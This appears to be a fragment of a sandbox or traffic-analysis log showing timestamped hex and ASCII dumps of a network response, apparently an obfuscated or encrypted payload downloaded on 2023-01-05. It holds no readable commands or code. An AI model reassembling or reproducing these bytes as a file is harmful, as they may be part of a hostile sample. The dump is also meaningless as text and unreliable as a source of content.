                                                                                                                                                                                                                                                                Data Ascii: `J}zgkBnqzxe|katdHq.Oxjnwx}frmDet`J}zgkBnqzxe|klbtdHq.Oxjnwx}frmEet`J}zgkBnqzxe|khbtdHq.Oxjnwx}frmBet`J}zgkBnqzxe|kdbtdHq.Oxjnwx}frmCet`J}zgkBnqzxe|k`btdHq.Oxjnwx}frm@et`J}zgkBnqzxe|k|btdHq.Oxjnwx}frmAet`J}zgkBnqx`|keojvlanamnDqPv2Z~inb\i`q
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC233INData Raw: 66 8d 36 6e 71 58 76 f5 6a 95 4e c7 64 53 63 8e 2f 78 67 65 68 fd 71 73 5a d5 72 4c 6a 96 3a 74 62 6a 71 eb 67 5a 44 47 75 77 77 64 2d 6b 6b 66 64 f7 7a 33 71 4f 67 4a 69 32 2e 50 76 6c 72 f8 63 d9 48 4a 66 45 70 d8 01 6d 68 66 71 c3 7e ac 5e 36 6f 49 65 8c 04 62 71 70 67 fe 60 be 5d 3a 72 43 73 63 0c 6e 64 7c 62 f1 79 a6 4b 1c 6c 46 70 f0 1b 64 72 63 6b ff 7c 8a 47 cb 71 50 66 c1 05 6e 71 58 76 f7 72 8d 47 df 64 5c 63 da 1c 78 67 65 68 fd 71 aa 5a e2 76 43 6a ae 09 74 62 6a 71 eb 67 63 45 c7 71 78 77 ac 1f 6b 6b 66 64 f7 6a e9 5f cd 63 45 69 be 1c 50 76 6c 72 e8 63 f8 4a 67 62 4a 70 9c 0a 6d 68 66 71 d3 7e d1 5c d2 6f 47 65 98 0f 62 71 70 67 ee 60 ae 5f 00 76 4d 73 6b 05 6e 64 7c 62 e1 79 a7 49 d4 6c 44 70 58 18 64 72 63 6b ed 6c 9e 4c 32 71 52 66 75 06
                                                                                                                                                                                                                                                                Data Ascii: f6nqXvjNdSc/xgehqsZrLj:tbjqgZDGuwwd-kkfdz3qOgJi2.PvlrcHJfEpmhfq~^6oIebqpg`]:rCscnd|byKlFpdrck|GqPfnqXvrGd\cxgehqZvCjtbjqgcEqxwkkfdj_cEiPvlrcJgbJpmhfq~\oGebqpg`_vMsknd|byIlDpXdrcklL2qRfu
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC249INData Raw: 71 58 76 74 6a 95 4e c7 64 da 60 62 71 78 67 6e 68 28 71 36 5f f1 6f c5 69 ae 37 77 62 6a 71 6e 67 7e 14 f2 6c fe 74 64 72 6b 6b 6d 64 72 7a 33 71 f1 66 c3 6a a2 22 53 76 6c 72 7b 73 90 41 dd 62 cc 73 78 67 6d 68 6d 71 16 76 02 5b c0 76 c0 66 90 31 61 71 70 67 7b 68 7d 0d e0 6b ca 70 6b 6b 6e 64 77 62 64 69 29 67 e4 69 c0 73 a0 25 67 72 63 6b 7e 7c 8a 47 cb 71 d6 65 6d 68 6e 71 53 76 22 72 0d 42 d3 79 da 60 6a 25 7b 67 65 68 78 71 43 0a a7 6f c5 69 6e 64 74 62 61 71 7e 7f 3c 68 e7 70 fe 74 70 26 68 6b 66 64 64 7a 9c 54 d1 67 c3 6a 6e 71 50 76 67 72 2d 6b 08 4d a5 7f cc 73 54 33 6e 68 66 71 46 76 77 0e bc 76 de 66 74 62 62 71 7b 67 6b 70 3f 71 d9 77 d6 70 57 3f 6d 64 7c 62 72 69 86 42 c4 68 dc 73 50 76 64 72 68 6b 28 64 12 4b 2c 66 ca 65 39 3c 6d 71 58 76
                                                                                                                                                                                                                                                                Data Ascii: qXvtjNd`bqxgnh(q6_oi7wbjqng~ltdrkkmdrz3qfj"Svlr{sAbsxgmhmqv[vf1aqpg{h}kpkkndwbdi)gis%grck~|GqemhnqSv"rBy`j%{gehxqCoindtbaq~<hptp&hkfddzTgjnqPvgr-kMsT3nhfqFvwvftbbq{gkp?qwpW?md|briBhsPvdrhk(dK,fe9<mqXv
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC265INData Raw: 7e 70 60 03 4e 17 6e 89 7b 83 4e ec 64 6d 7a 14 73 e5 7e 70 60 03 4e f7 6e 89 7b 83 4e ce 64 85 7b ab 5f a5 7e 68 60 2a 61 b5 6e 79 7a 15 4d ae 64 85 7b ab 5f 85 7e 70 60 03 4e 95 6e 61 7a 3c 62 8e 64 45 7a 14 73 65 7f 70 60 03 4e 75 6f 61 7a 3c 62 4c 65 6d 7a 14 73 45 7f 70 60 03 4e 37 6f 61 7a 3c 62 0c 65 6d 7a 14 73 05 7f 70 60 03 4e f5 6f 79 7a 15 4d ec 65 6d 7a 14 73 c5 7f 68 60 2a 61 d5 6f 79 7a 15 4d ac 65 6d 7a 14 73 a5 7f 70 60 03 4e 14 76 61 7a 3c 62 ed 7c 6d 7a 14 73 c4 66 68 60 2a 61 b4 76 61 7a 3c 62 8d 7c 6d 7a 14 73 64 67 68 60 2a 61 54 77 61 7a 3c 62 2d 7d 6d 7a 14 73 25 67 11 7d 53 49 14 77 61 7a 3c 62 ed 7d 6d 7a 14 73 c4 67 68 60 2a 61 b4 77 61 7a 3c 62 8d 7d 6d 7a 14 73 64 64 68 60 2a 61 54 74 61 7a 3c 62 2d 7e 6d 7a 14 73 04 64 68 60
                                                                                                                                                                                                                                                                Data Ascii: ~p`Nn{Ndmzs~p`Nn{Nd{_~h`*anyzMd{_~p`Nnaz<bdEzsep`Nuoaz<bLemzsEp`N7oaz<bemzsp`NoyzMemzsh`*aoyzMemzsp`Nvaz<b|mzsfh`*avaz<b|mzsdgh`*aTwaz<b-}mzs%g}SIwaz<b}mzsgh`*awaz<b}mzsddh`*aTtaz<b-~mzsdh`
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC281INData Raw: 50 12 14 2f 23 78 2d 0b 05 36 07 3f 26 5d 44 2f 6b 18 34 07 3a 0a 46 0b 56 28 0b 6e 3a 69 47 3c 2a 24 24 57 3e 23 62 01 1f 0c 3f 25 24 2d 30 21 3c 64 01 1d 20 5f 0d 04 56 18 41 36 13 01 24 0f 36 66 3c 55 41 6b 38 3c 0e 1c 50 5b 25 40 3f 07 68 09 3b 21 1e 09 07 3d 5f 27 00 74 15 20 39 22 21 3b 00 34 23 1d 10 32 3a 59 20 2c 2e 33 11 62 05 19 13 05 0d 1a 22 25 38 55 72 3b 1c 36 0c 00 23 50 40 4e 3f 6d 11 22 27 34 01 33 1a 01 08 17 51 24 57 21 09 3b 51 1b 2b 6e 05 17 40 0c 23 0d 32 56 06 04 62 04 26 32 0f 39 0c 2d 33 26 2e 64 0a 25 5f 58 2a 15 0a 29 35 11 37 14 2d 5c 41 67 10 34 37 6b 28 5b 2d 1c 21 0d 12 0e 21 35 68 2d 09 04 1e 08 3b 29 0c 29 13 74 1b 2c 37 2d 23 1e 00 58 08 32 42 33 43 3e 21 1a 08 15 05 62 3c 0d 2a 05 12 03 3d 1e 44 54 72 05 0f 37 3c 33 52
                                                                                                                                                                                                                                                                Data Ascii: P/#x-6?&]D/k4:FV(n:iG<*$$W>#b?%$-0!<d _VA6$6f<UAk8<P[%@?h;!=_'t 9"!;4#2:Y ,.3b"%8Ur;6#P@N?m"'43Q$W!;Q+n@#2Vb&29-3&.d%_X*)57-\Ag47k([-!!5h-;))t,7-#X2B3C>!b<*=DTr7<3R
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC297INData Raw: 49 4a 5e 55 0e 0d 42 68 76 09 2d 0a 53 56 54 4c 56 06 49 1d 50 5f 5b 5a 49 33 12 5c 11 5d 5e 0c 02 46 01 55 41 19 02 54 09 5b 15 50 1b 3b 42 0f 5b 59 51 16 01 5a 14 49 51 0f 5c 5d 42 36 4f 54 46 5f 0a 0f 51 10 04 55 48 4f 57 09 5f 5e 71 3d 29 54 43 5a 5d 5c 01 10 51 03 14 49 52 59 5b 0c 46 32 4e 06 46 5a 5b 5e 50 16 52 00 41 40 05 08 58 6e 1c 0f 17 50 4a 53 08 0f 53 10 50 53 17 4c 53 0b 0b 0f 48 65 4f 57 16 08 5a 08 00 43 52 5b 40 1b 04 5d 68 03 2e 69 4e 53 42 5d 5d 5c 01 15 57 55 40 4c 56 0f 58 56 41 61 40 53 42 52 0f 5a 57 40 53 06 10 4f 55 6d 05 31 47 62 46 55 42 59 5b 59 51 47 57 03 45 48 52 5a 09 57 42 61 40 52 44 5e 0e 56 5d 47 50 03 14 1a 67 00 37 5e 41 35 12 54 41 0d 53 0c 55 40 03 56 41 4c 5e 0c 0e 56 45 32 15 5c 43 0e 59 0f 00 4c 50 04 17 78 0a
                                                                                                                                                                                                                                                                Data Ascii: IJ^UBhv-SVTLVIP_[ZI3\]^FUAT[P;B[YQZIQ\]B6OTF_QUHOW_^q=)TCZ]\QIRY[F2NFZ[^PRA@XnPJSSPSLSHeOWZCR[@]h.iNSB]]\WU@LVXVAa@SBRZW@SOUm1GbFUBY[YQGWEHRZWBa@RD^V]GPg7^A5TASU@VAL^VE2\CYLPx
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC313INData Raw: ec 42 75 56 64 e0 42 6d 4b 6c 65 7a 7f 67 78 78 64 6c 66 73 74 42 f2 54 76 6d 79 ea 50 72 62 63 70 6a e3 59 6c 68 63 d4 4e 62 72 6a 6a 7c e0 4c 66 64 63 fc 5b 6b 48 6c 6c 5e 78 6a 7b 6b 68 73 6a 7a 6c 70 f5 44 63 6b 7a ea 31 57 76 66 7c 77 79 ea 24 70 64 70 f5 3c 60 6d 6a 6f 7f 42 f2 20 76 6d 79 ea 2c 72 42 62 6c 6a e7 f0 61 6e 70 4d 64 e4 ef 79 ef 26 60 72 70 e6 3d 7d 47 6c 75 60 6d 58 76 66 6f 65 77 7c e0 38 66 64 63 fc 37 68 48 6c 6d 4c 78 6c 72 68 77 72 6a 66 e6 32 75 7e 75 e9 3c 69 71 52 78 78 60 ef 3f 6a 62 66 e6 3a 74 58 65 6f 74 60 79 50 75 66 6e 65 79 ea 3c 70 64 70 f5 24 6f 6d 6b 6f 6d 5e 64 e0 2e 6f 6d 7c e0 14 67 42 70 76 7a 63 60 6e 73 5e 6b 6a 60 ef 0b 6a 62 66 e6 06 77 58 66 7f e8 f3 7f 59 76 66 60 eb f6 60 76 f0 06 66 77 6a e3 05 6d 4e 71
                                                                                                                                                                                                                                                                Data Ascii: BuVdBmKlezgxxdlfstBTvmyPrbcpjYlhcNbrjj|Lfdc[kHll^xj{khsjzlpDckz1Wvf|wy$pdp<`mjoB vmy,rBbljanpMdy&`rp=}Glu`mXvfoew|8fdc7hHlmLxlrhwrjf2u~u<iqRxx`?jbf:tXeot`yPufney<pdp$omkom^d.om|gBpvzc`ns^kj`jbfwXfYvf``vfwjmNq
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC329INData Raw: 54 b7 71 b8 88 68 cf 93 83 aa 45 ad 64 b3 56 25 cd 9d 83 8f 54 85 0b 72 17 86 4f 86 67 3f 15 86 75 74 b6 42 78 cd 54 ac a2 ba 73 67 db 83 77 49 be d1 ec 76 a7 8a cd 42 c8 62 80 81 9d fa 4a cd b2 bf 23 cb f6 d6 0b db 44 be a8 86 98 cd 7e 53 62 c1 e2 2b 23 07 ec 36 d5 dd a7 39 9a d8 db 1f 6f 85 b8 51 d2 64 f0 25 51 64 bd 52 1b 5d 15 9b 4e d4 61 57 ab 7e 2a be ae e0 38 8c a5 5e 86 0c 39 a5 27 f7 c0 0f 69 4d 08 c0 5c 3d 7b d5 e2 1e e2 b2 35 cc 86 6e f4 45 a4 b2 af 51 d1 2f 63 68 ad b3 04 83 b2 3d 23 2e 99 4f 54 a9 89 00 cf e1 cd bb 5b f3 ed c1 3e 41 68 70 36 7f 97 ac 59 71 49 db 1d 18 c4 c4 77 7c 7f ee 41 63 cf f0 ea da d3 32 a9 3e 5d 42 09 ed 30 3e 76 58 a3 16 cd e6 13 c7 05 57 e6 19 3b 42 e9 89 77 a5 42 78 3e 6c 41 52 00 51 d0 2e d3 ba 81 ca c8 cf 49 88 c8
                                                                                                                                                                                                                                                                Data Ascii: TqhEdV%TrOg?utBxTsgwIvBbJ#D~Sb+#69oQd%QdR]NaW~*8^9'iM\={5nEQ/ch=#.OT[>Ahp6YqIw|Ac2>]B0>vXW;BwBx>lARQ.I
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC345INData Raw: 12 8a a7 ae d4 aa a6 d9 eb 72 67 59 e9 ac aa 52 91 55 c8 94 b8 e6 25 33 d8 ad d3 86 01 84 40 8a 6b 44 1c 06 f0 39 b1 42 6b 41 44 42 2c fb a2 b4 a7 6b 43 d9 09 5f 62 0c 0f db 2c 5d f4 63 a5 15 ad 3e b8 df d8 28 ec 21 31 63 75 83 26 6a a3 76 40 4e f8 0f a2 ca a0 88 c4 25 e6 c8 42 36 02 40 9c b6 b1 21 a4 c7 67 c0 06 eb 77 64 18 da e4 90 03 40 d8 bb 7d ae cc 37 5d 27 ee 74 5a a5 1d 89 6c b8 df f0 07 c6 72 9e c4 d7 f3 59 52 89 54 59 ef d3 7a e1 e1 26 53 75 f4 02 21 54 c7 87 7d c0 a8 1b b9 4f 40 1b fc c8 91 71 f0 51 6b c3 e7 2b 5f 7e 38 49 b7 0a 3f 9a 6b 50 62 52 23 f7 e0 92 6f 73 2c d9 97 05 ec 25 09 84 3b 42 f7 51 d5 28 7e 3d ae c9 f7 51 68 00 30 15 01 d5 e6 aa fb 3a 2b 3c af c5 02 8c 3f b3 30 3f e9 d1 e0 e9 a2 8b 6e b6 36 a2 5d a0 55 27 6a 19 52 d4 ab 01 8c
                                                                                                                                                                                                                                                                Data Ascii: rgYRU%3@kD9BkADB,kC_b,]c>(!1cu&jv@N%B6@!gwd@}7]'tZlrYRTYz&Su!T}O@qQk+_~8I?kPbR#os,%;BQ(~=Qh0:+<?0?n6]U'jR
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC361INData Raw: f2 b4 7a 6e 18 06 b0 ae 86 72 da ab 17 c6 90 b5 6c ec 8f 54 b2 cb 0b a3 fd 93 a4 5e 69 6b 73 b3 ff 8f 38 23 ce 94 bd 2e e2 af 37 83 39 15 13 2a 6f a6 08 28 e9 cc 90 32 f4 7b 37 e8 4a bb 0d d9 c6 64 63 9b 8d 88 da 5e a0 60 f8 98 23 16 21 ea cc 0d 83 0e 95 cb e1 de d3 30 c2 3f ea 3c 3f e5 60 30 c6 47 98 c7 50 47 ff 66 3a c0 ed 26 79 69 a6 4a 06 04 cf da 66 2e 76 54 b1 79 75 c4 05 1b 6f 34 9b 5d 27 04 fa 59 e0 ba e1 14 e0 d0 1b b4 fa f0 c4 90 13 fb 0d b8 83 c6 4d 5a 76 c5 0b 69 fe 0c 4d 77 79 de f3 b5 88 ec 66 cd fb 55 e6 de 21 a3 d3 35 82 e3 39 ee 4e fc ca 37 99 dc 01 65 40 32 aa 94 41 3d cd c7 f4 50 dd 70 38 88 7e 3a 51 3d a3 46 8f 45 d5 82 04 5f 56 46 3e 0d ff 3d 27 b2 5b 46 59 47 85 38 46 c8 bc c1 4d d7 66 3e a4 b9 65 fa 6b a1 9a 35 bb 4c 2f e1 b4 89 69
                                                                                                                                                                                                                                                                Data Ascii: znrlT^iks8#.79*o(2{7Jdc^`#!0?<?`0GPGf:&yiJf.vTyuo4]'YMZviMwyfU!59N7e@2A=Pp8~:Q=FE_VF>='[FYG8FMf>ek5L/i
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC377INData Raw: 23 1b 81 55 85 72 d9 90 da 63 37 8f fb 5c 30 4d 33 68 e2 d6 6c 63 97 33 22 15 5b ad 11 87 89 11 25 2e 2c a9 cd 09 cc 60 b6 8e 3d 99 8d 42 25 4a ea 46 4d 81 15 85 19 77 f8 4b c1 6a 72 a1 85 11 46 4a 1c 73 94 b7 42 35 9e 5b 5f 1f 24 1d 46 55 2e 37 3a b4 3b 05 16 fb 35 3f f0 71 a2 ea 0b d0 6b 35 54 26 d6 a4 e6 53 ea 6b fa 11 6f a6 9e 15 e9 f8 ff df 3c 5e 2a 20 56 ff cf bb 36 ed 64 ca 59 d1 0f 92 45 cb 90 07 4a 26 44 47 0c 93 dd e2 1b f5 6f 46 ff 89 d4 b2 3d ab 17 63 b1 ae ac 97 99 61 18 3d 2c 03 2c 3d e6 1f d3 1f 18 71 c6 5b 1d ea 87 a8 b2 4e a5 13 8e 04 ae 43 a0 8c f4 a3 13 e5 ec 81 5e 5a 67 fa 20 52 a4 56 d4 1f 82 84 bf 49 10 1d f0 c5 c9 33 3c b4 7a 7d b2 e7 b3 fb 43 fa d8 d3 88 5c 05 39 95 b4 f1 b0 a0 e7 7a af 33 ac 1a 3e 18 19 42 92 f1 db b6 95 82 2d 1a
                                                                                                                                                                                                                                                                Data Ascii: #Urc7\0M3hlc3"[%.,`=B%JFMwKjrFJsB5[_$FU.7:;5?qk5T&Sko<^* V6dYEJ&DGoF=ca=,,=q[NC^Zg RVI3<z}C\9z3>B-
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC393INData Raw: 4c ef c8 8a ba 93 ab 44 a1 c5 de 48 fb 15 dd 2e 1c 77 52 7a f1 20 fd 02 b2 b6 c0 03 2b 4b f0 80 ea 23 0b 2e 4b 1d 73 96 cb b4 4b 95 54 83 03 2b ac 50 ef 4a 84 4b cd 27 a6 bf e3 d3 39 bd 2c d1 0b 0c b6 a2 ff 8d 4e 96 d2 5d da fa a2 50 ad ae 48 22 3c 80 38 f6 ee d1 08 9f b4 72 01 32 34 6d f4 21 1e 71 d0 c3 8c 2e 4b ba b8 51 cf 82 99 13 6a 5f 09 8a 73 6c 09 2e 65 6b 6b d6 a6 0f 9d 8f 21 53 b6 52 80 c1 72 ed 83 29 97 bd 99 70 ad 6d 96 1e 3a f8 00 e7 9c 6b 2f e7 2d 72 cc ed b1 3b e7 56 71 7f f8 69 8d 97 cf 04 15 dc d9 d3 e4 9e a2 fe c9 e0 7f cb 83 fd a8 95 0e e6 f2 78 95 db 22 bd 90 a4 6e b6 71 65 9e 6a b7 14 ac ac 12 30 a4 db 97 fb 28 34 80 58 27 b2 ed 3e 8a 09 e8 f8 08 38 89 ec 92 87 6a 19 b5 20 c9 cf 0c 73 dc d4 e8 b8 50 92 e1 b9 28 0c ea 94 80 c8 33 91 fe
                                                                                                                                                                                                                                                                Data Ascii: LDH.wRz +K#.KsKT+PJK'9,N]PH"<8r24m!q.KQj_sl.ekk!SRr)pm:k/-r;Vqix"nqej0(4X'>8j sP(3
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC409INData Raw: 7d 43 0e 8e 99 36 67 72 1e ab a1 ce 7c 6c e8 91 66 6a a8 b3 06 c8 4a b0 bb ab 64 ee aa 32 2b e7 ab 41 0c 9d 78 cb f5 22 9f fb 20 ac 3d 4f ed c2 d6 36 e8 57 c3 09 ac 92 73 ec 83 f9 e5 83 1f 22 b9 82 e4 e5 77 5a 42 ea 79 b0 17 f1 ca df d1 3d a9 23 bb 0f 79 c9 a2 56 c0 85 a6 bc 4b 0b 53 56 72 c0 81 c4 87 3f 98 f2 db b0 47 e0 2d 6d 9b 3c 78 37 36 e2 20 7a c0 20 d0 6a 85 e2 7d da 66 21 5e 7e 3a 25 b4 5f 84 24 69 31 a8 cc ac d8 5a e4 42 7d 8e a8 46 2a a4 10 fb b6 20 d0 d2 13 1d bc d6 0e 93 d4 58 6f 3d a4 3a 58 7b da f1 7a 22 67 d5 a6 ec f3 68 be 0a 49 e9 42 ba 47 7d 8f 2a 57 9c a1 ac da 71 43 93 a2 14 17 b9 be 3a f9 ea ac 3d 86 46 01 ab b3 83 96 0f 51 e5 ee 8a d3 9d 6d 99 e0 0c f0 df 23 d7 bb 93 23 5a 85 c4 7a 33 1b 99 31 4e 39 16 86 80 91 0b 92 3e 1e 43 51 9e
                                                                                                                                                                                                                                                                Data Ascii: }C6gr|lfjJd2+Ax" =O6Ws"wZBy=#yVKSVr?G-m<x76 z j}f!^~:%_$i1ZB}F* Xo=:X{z"ghIBG}*WqC:=FQm##Zz31N9>CQ
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC425INData Raw: 4e 27 32 b8 84 39 5e 08 de fe 77 5b 8d 35 4e 5c 1e 09 aa 04 1c 57 1c f5 9a 24 40 86 bb 0e 1e 14 2d 46 e3 d2 d1 e4 49 39 d8 bb 1d 42 0c de 17 e0 79 7b cb 71 07 9f 21 b2 08 da 69 14 43 c1 f3 17 5f f8 c1 4b 16 b8 60 c0 08 96 be 12 af cd 13 28 15 c9 0e f3 61 97 13 42 0c a2 1b bc 35 b7 54 03 9e 5e 25 02 bf af 11 ea 06 2e 37 dd 17 67 71 ad ce 10 4c 12 a1 11 a1 4f 8b 53 88 3b 92 d2 c7 0f 38 4d 83 bf 28 85 54 74 3a a2 55 ad 50 54 8b 17 10 29 85 90 48 80 1c ff 75 8b c9 6b c5 da 56 a4 d4 0c 56 ba 76 81 2c 0a f7 46 03 ca 43 b6 4f 6c ab c6 c3 45 4f 7c 91 f3 de d0 46 9a 27 3b e9 e7 aa c9 d2 56 4b 39 19 e1 9c f9 6c ee a8 4e 58 53 1a b3 bc 52 aa 58 3d d8 e9 11 1c 6f 47 c8 42 a7 f1 ef 89 2c d1 71 df 04 f6 0a bd 86 1a 1d 63 81 8c 2f 95 8c 8a 44 7b 25 84 de 7c bc 04 d9 86
                                                                                                                                                                                                                                                                Data Ascii: N'29^w[5N\W$@-FI9By{q!iC_K`(aB5T^%.7gqLOS;8M(Tt:UPT)HukVVv,FCOlEO|F';VK9lNXSRX=oGB,qc/D{%|
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC441INData Raw: da 62 57 a9 bb 94 33 7e fd 68 83 df 4d a6 a9 e4 43 fc a7 7c 1e e5 a8 63 7b 1c e2 87 e2 4a f5 b9 40 0d 5b 50 b5 8b fd 49 87 2d f7 28 39 f7 96 d0 a3 7e 6b 5e 2a b4 04 c9 18 6b a3 0b e1 71 a8 2f c2 b7 ab 8a 50 86 d1 6d 50 63 24 ee 8d 1f 73 bf 7a f9 50 04 2f 70 ba fb ef dd d0 d9 95 73 e9 41 f4 d6 bd 01 7f d8 d4 8c 8b db 24 ab e4 e8 86 9a 3f cd 95 ca be 94 89 c0 ba 1c 27 10 9a 9f a4 10 de 78 5a d1 8e 2b 48 44 34 85 e3 a2 8b 8b 44 ed f9 e9 1c 4f 97 a2 a7 6f 91 67 10 8e 6a a6 9f 6d 45 ed f9 ed 64 fc 11 72 a3 a3 77 15 80 53 8f 21 37 0d 98 5a 08 ca 32 93 7b 40 fe c7 55 f5 39 54 8a 9c 1c 4d 6b 7b 0f 87 52 2c f6 e7 7d ef 89 fe 52 44 2b 90 b2 f8 fd fa 59 57 24 33 ab 96 2f 38 d4 d8 a4 41 14 7f 2b eb 46 0d 33 d6 d9 e5 cf 21 e3 27 54 13 fb 8f 98 2d d6 08 62 1b 39 5c 88
                                                                                                                                                                                                                                                                Data Ascii: bW3~hMC|c{J@[PI-(9~k^*kq/PmPc$szP/psA$?'xZ+HD4DOogjmEdrwS!7Z2{@U9TMk{R,}RD+YW$3/8A+F3!'T-b9\
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC457INData Raw: 34 43 aa ab 73 b2 01 31 53 d4 f6 23 17 eb 62 23 19 87 44 19 8a 83 0f ef 1b dd 90 77 27 88 82 18 a6 99 d9 f8 ca 73 70 bd 96 58 ba f2 f6 33 a5 7b 9a 1b 9f 7f b1 14 43 b1 a2 21 94 95 bd a4 ec c3 9a 96 1e 5d b7 ce a4 37 a7 32 cb 17 ea 8e 79 f5 5c d5 f7 90 0e 8d f2 20 a0 e8 9f 2f ce 76 8f 13 97 33 80 7a 94 67 19 bf 13 81 a0 52 c5 81 ce fb 89 1b 28 e4 04 c5 d3 cb d9 6c 96 8b d1 51 13 53 dc 95 83 cd 87 37 be 8c 1b 4e 6c 38 8b a1 90 02 a6 8d 2f 26 b8 da 6d 17 90 50 54 0f d8 f8 1e b1 68 a3 d3 0d cf 4e 89 5c 2d f3 4c 83 12 bd 9b 9e 4e b5 b0 c3 0f a6 b6 9e 79 b6 c9 d6 1e 51 9f 1b 8d 45 14 d7 98 d2 c6 81 0e 9b 00 59 5d ae 90 2f 2f c7 8f 5d 02 ce 88 82 85 ea 96 15 09 b2 b9 15 94 bd 7e 93 ce 16 ae 9a 9c 23 94 d2 89 2e fa 1c 2c 07 2c 85 99 5c fa d5 ad ca a1 30 0f d5 c3
                                                                                                                                                                                                                                                                Data Ascii: 4Cs1S#b#Dw'spX3{C!]72y\ /v3zgR(lQS7Nl8/&mPThN\-LNyQEY]//]~#.,,\0
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC473INData Raw: a1 f1 42 14 4b c1 23 aa 3a a0 49 3e d9 b7 9a d9 6e b9 5c f5 8a 86 42 ff 9e 80 a0 09 3b 3d d8 c3 3c 82 44 92 ed 85 0f ce f9 51 1f 58 99 ba c0 ea d8 67 c4 b5 7a 3d 0b a2 f8 b6 7d 16 bf 2c 9e 52 e7 c0 7e 06 82 cb 86 5f 86 3a 86 91 db f1 39 52 3a 30 b7 c4 67 3b ea bb 14 c2 49 36 54 95 e2 4e cb 33 bc 60 5f 56 f4 17 df ff af 05 b0 9c 58 f8 1e dc 73 cd d5 3e 85 b3 ad 9c 1b 57 87 90 60 54 7c dd ea 67 d4 7f 2e f7 62 ff 97 33 b8 55 3f 60 0d f8 83 a0 0e e1 f1 b5 c9 a3 0b c8 62 01 6b d5 b1 0e 26 79 f0 d6 28 f6 53 95 07 02 94 59 a3 42 54 12 f9 a4 3d 60 0b 56 92 34 2c 1b 61 d9 b1 f5 e0 1d f7 7a ef 76 09 7b 00 1e 43 9f 1d dc ba 93 6c 52 8e b4 ef bc 2e f4 e1 79 58 92 ac 71 4e 9f 31 47 83 12 83 7c 10 53 cd 51 4d 49 82 5d db 65 88 71 99 b2 82 66 e1 52 67 7d 2f 56 69 6b dd
                                                                                                                                                                                                                                                                Data Ascii: BK#:I>n\B;=<DQXgz=},R~_:9R:0g;I6TN3`_VXs>W`T|g.b3U?`bk&y(SYBT=`V4,azv{ClR.yXqN1G|SQMI]eqfRg}/Vik
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC489INData Raw: d0 ca 69 3a 49 2a ca 56 8a 8b dc a8 c5 3d 1f ab d5 f6 23 95 5c d9 07 18 f6 8c f9 84 8e 9a b0 b9 15 b7 25 cd 5c cb 3b 38 9d 5b 8c b7 93 d3 71 97 68 b5 6f 92 fe b2 72 55 57 2a ac 1a 5e 9b e8 61 41 dd 16 b6 3b 3d d9 d8 ed 0a 5b ea 9f 0c 87 c1 8b 53 eb b0 6c a2 87 f4 fa ca 42 2d 4f f3 1c 5b 05 2c e9 50 cf 47 d6 97 c6 86 13 74 65 95 0d ac 31 a1 86 74 58 50 94 8d 90 3d 04 17 01 4c 8c 80 ab 09 41 95 13 16 88 d1 de 97 5e b7 e9 ac 3d 41 23 40 0c 58 5a 35 81 3d a6 9a 6d bd 7a 3f 5a 10 65 bd 7e 43 4d 1e 48 d8 c4 00 22 9c b2 8c 3c 95 cd ee 4d 41 95 d4 bc 44 40 1b 35 c7 76 04 4b 02 52 6c 55 82 ff 33 53 8c b4 fc ad 25 0d 4f 85 12 4b 22 54 b5 53 ef 38 3d fe c2 4b 8d 2d ab 12 5d a8 f9 84 43 08 fd 92 c9 e0 58 4e 51 f3 d0 ec ae 6a 41 15 89 ec ff a6 dd c2 e9 de 72 d2 0d 40
                                                                                                                                                                                                                                                                Data Ascii: i:I*V=#\%\;8[qhorUW*^aA;=[SlB-O[,PGte1tXP=LA^=A#@XZ5=mz?Ze~CMH"<MAD@5vKRlU3S%OK"TS8=K-]CXNQjAr@
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC505INData Raw: 46 8c 14 82 7b fe cf f6 3f 90 56 51 bc 4a d7 75 1c fd 16 d1 cf 1b 93 f9 69 b4 25 3a 17 30 9a 82 65 54 b6 8f 83 8b 5f 22 35 02 21 f3 ad 0d 5d fb 35 03 5e 83 80 94 8b 8f b0 9b 50 d8 18 9c 09 6e 90 fc f0 7c ef 35 38 b1 6a 76 39 8e 3f 21 f6 ad 89 da fa 67 75 a9 29 e7 83 db c0 36 64 d8 a0 d8 d4 3d 6c 8f 98 f8 2d 91 92 6f 46 dd c0 0e e9 05 8b b4 34 50 71 de 73 84 27 e0 73 32 5e 4e 78 24 d4 98 39 fc 37 3a 1f b8 56 6b 22 c8 17 48 31 28 84 cb 2e 27 94 bd eb dc 95 74 ad ea 8c 5e 83 1d 58 35 e1 d0 63 2e ed 69 0a e7 c4 f4 b2 9e 28 3c 7d cb 16 5d f2 57 fd 51 19 53 91 7c fe f7 81 fa 93 c8 86 74 ac 7d 3f ab 7c 89 3e f8 f1 fb 97 6c 68 3b 5f d3 47 1d e6 ae 13 d2 44 64 2e d3 26 8e 62 8b 50 0e fb b4 35 0a 51 36 59 c4 d1 ff 71 6c 31 41 93 b1 a4 e6 a8 0e 20 86 81 30 f9 aa ef
                                                                                                                                                                                                                                                                Data Ascii: F{?VQJui%:0eT_"5!]5^Pn|58jv9?!gu)6d=l-oF4Pqs's2^Nx$97:Vk"H1(.'t^X5c.i(<}]WQS|t}?|>lh;_GDd.&bP5Q6Yql1A 0
